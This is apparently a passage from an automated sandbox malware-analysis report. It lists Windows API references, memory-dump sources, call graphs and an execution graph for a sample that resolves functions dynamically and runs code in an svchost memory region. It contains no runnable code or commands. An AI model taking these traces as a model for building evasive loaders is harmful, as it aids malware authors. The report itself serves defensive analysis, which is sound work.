                    • Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
                    • Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
                    • Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
                    • Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042
                    • Part of subcall function 00171AD0: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00171C1A,?,0018190D,?,00171C1A,?,?), ref: 00171AFB
                    • Part of subcall function 00171AD0: WriteFile.KERNEL32(00000000,?,00171C1A,000000CC,00000000,?,0018190D,?,00171C1A,?,?,000000CC), ref: 00171B1D
                  • ??3@YAXPAX@Z.MSVCRT ref: 00172176
                  • _time64.MSVCRT ref: 001721A8
                    • Part of subcall function 0017CCF0: SysFreeString.OLEAUT32(?), ref: 0017CD01
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 0017C8C0: GetFullPathNameW.KERNEL32(?,00000105,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0017C938
                  • _time64.MSVCRT ref: 00180D4F
                    • Part of subcall function 00171C30: ??2@YAPAXI@Z.MSVCRT ref: 00171C52
                    • Part of subcall function 00171C30: ??3@YAXPAX@Z.MSVCRT ref: 00171C9A
                    • Part of subcall function 00177A20: SysFreeString.OLEAUT32(?), ref: 00177A3C
                  • ??3@YAXPAX@Z.MSVCRT ref: 00180D82
                    • Part of subcall function 0017F0B0: ??2@YAPAXI@Z.MSVCRT ref: 0017F1C7
                    • Part of subcall function 0017F0B0: ??3@YAXPAX@Z.MSVCRT ref: 0017F206
                    • Part of subcall function 0017F0B0: ??3@YAXPAX@Z.MSVCRT ref: 0017F29B
                  • _time64.MSVCRT ref: 00180D9D
                  • ??3@YAXPAX@Z.MSVCRT ref: 00180DCC
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • ??2@YAPAXI@Z.MSVCRT ref: 00182ADD
                  • ??3@YAXPAX@Z.MSVCRT ref: 00182B54
                  • _time64.MSVCRT ref: 00182B82
                    • Part of subcall function 0017CCF0: SysFreeString.OLEAUT32(?), ref: 0017CD01
                  • ??3@YAXPAX@Z.MSVCRT ref: 00182BAA
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 0017995A: GetModuleHandleA.KERNEL32(00000000), ref: 00179961
                  • __set_app_type.MSVCRT ref: 001837C0
                  • __p__fmode.MSVCRT ref: 001837D6
                  • __p__commode.MSVCRT ref: 001837E4
                  • __setusermatherr.MSVCRT ref: 00183805
                    • Part of subcall function 00171401: _controlfp.MSVCRT ref: 0017140B
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • InterlockedDecrement.KERNEL32(?), ref: 00177CFE
                  • SysFreeString.OLEAUT32(00000000), ref: 00177D13
                  • ??_V@YAXPAX@Z.MSVCRT ref: 00177D21
                  • ??3@YAXPAX@Z.MSVCRT ref: 00177D2A
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd

                  Execution Graph

                  Execution Coverage:23.3%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:0%
                  Total number of Nodes:4
                  Total number of Limit Nodes:1

                  Graph

                  execution_graph 35 60000 37 60010 35->37 36 60125 37->36 38 6003c LoadLibraryW 37->38 38->37

                  Callgraph

                  • Executed
                  • Not Executed
                  • Opacity -> Relevance
                  • Disassembly available
                  callgraph 0 Function_00060170 1 Function_00060000

                  Executed Functions

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 60000-6000d 1 60010-60018 0->1 2 600f8-600fb 1->2 3 6001e-60026 1->3 4 60125-60165 2->4 5 600fd-60120 2->5 6 60037-6003a 3->6 7 60028-60032 3->7 5->1 8 60051-60054 6->8 9 6003c-6004c LoadLibraryW 6->9 7->5 12 60056-6006a 8->12 13 6006f-60072 8->13 9->5 12->5 15 6008e-60091 13->15 16 60074-6008c 13->16 19 600c1-600c4 15->19 20 60093-600bf 15->20 16->5 19->5 22 600c6-600f6 19->22 20->5 22->5
                  APIs
                  Memory Dump Source
                  • Source File: 00000017.00000002.10780959462.00060000.00000040.sdmp, Offset: 00060000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_23_2_60000_svchost.jbxd

                  Non-executed Functions